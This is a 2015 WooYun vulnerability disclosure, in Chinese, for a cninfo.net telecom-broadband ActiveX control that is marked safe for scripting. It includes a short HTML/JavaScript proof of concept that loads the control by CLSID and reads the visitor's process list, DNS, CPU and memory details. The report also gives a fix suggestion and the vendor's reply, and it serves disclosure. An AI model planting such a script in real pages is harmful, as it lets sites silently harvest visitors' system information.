当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0150498

漏洞标题:cninfo.net/QOEINFO/ActiveX控件信息泄露

相关厂商:cninfo.net

漏洞作者: blast

提交时间:2015-10-30 22:03

修复时间:2015-12-17 14:48

公开时间:2015-12-17 14:48

漏洞类型:用户敏感数据泄漏

危害等级:中

自评Rank:7

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-30: 细节已通知厂商并且等待厂商处理中
2015-11-04: 厂商已经确认,细节仅向厂商公开
2015-11-07: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航
2015-12-29: 细节向核心白帽子及相关领域专家公开
2016-01-08: 细节向普通白帽子公开
2016-01-18: 细节向实习白帽子公开
2015-12-17: 细节向公众公开

简要描述:

系统进程列表、网络负载、DNS设置、CPU名、内存使用、CPU负载等均可远程读取。没必要开这么多接口吧。
页面写着电信宽带助手,不过不知道是不是电信的,百度了下好多站用的cninfo.net的子域名

详细说明:

插件地址:http://**.**.**.**/chinatelcom/speedtest/sccs/index.shtml

qoe.png


Class QOEPLUG
GUID: {B2F9A248-3AB5-493F-A7F8-5B7A9D026ED2}
Number of Interfaces: 1
Default Interface: _DQOEPLUG
RegKey Safe for Script: True
RegkeySafe for Init: True
KillBitSet: False

漏洞证明:

<object id="qoeinfo"
classid="CLSID:B2F9A248-3AB5-493F-A7F8-5B7A9D026ED2"
style="display: none;"></object>
<script>
var softwarecount = 0;
qoeinfo.GetProcessInfo();
processlist = qoeinfo.strProcessInfo.toLocaleLowerCase();
alert(processlist);
/*qoeinfo.GetDnsServer();
var dnsserver = qoeinfo.strDnsServer;
qoeinfo.GetNumComputer();
var fcw = qoeinfo.strNumComputer;
qoeinfo.GetMemUsage();
qoeinfo.GetMemSize();
var memoryusage = qoeinfo.strMemUsage;
memory = qoeinfo.strMemSize;
qoeinfo.GetCpuUsage();
var cpuusage = qoeinfo.strCpuUsage;
qoeinfo.GetCpuName();
cpuinfo = qoeinfo.strCpuName;
//qoeinfo.GetNetLoad();
var load = qoeinfo.strNetLoad;*/
//alert(load)
</script>

修复方案:

给数据加个密吧,或者限制调用者,或者没必要的话也不用搞这么多接口开放

版权声明:转载请注明来源 blast@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2015-11-04 14:29

厂商回复:

CNVD暂未直接复现所述情况,已经转由CNCERT向中国电信集团公司通报,由其后续协调网站管理部门处置.

最新状态:

暂无